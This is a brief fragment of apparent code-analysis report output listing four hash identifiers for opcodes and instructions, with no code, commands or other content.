                                                • Opcode ID: 3fb9bf5afcc84b579c1ec4651b99bcd186a4ff6c364566e9d8a586fb35a56149
                                                • Instruction ID: f3f210374947f0fdfe003fa00763941d8c6e0505675b04f5077e23a3b0b73085
                                                • Opcode Fuzzy Hash: 3fb9bf5afcc84b579c1ec4651b99bcd186a4ff6c364566e9d8a586fb35a56149
                                                • Instruction Fuzzy Hash: 0A811AB5D006799BDB219B54CC44BEEB7B8AF08754F0045EAAA19B7240D7709E84CFA0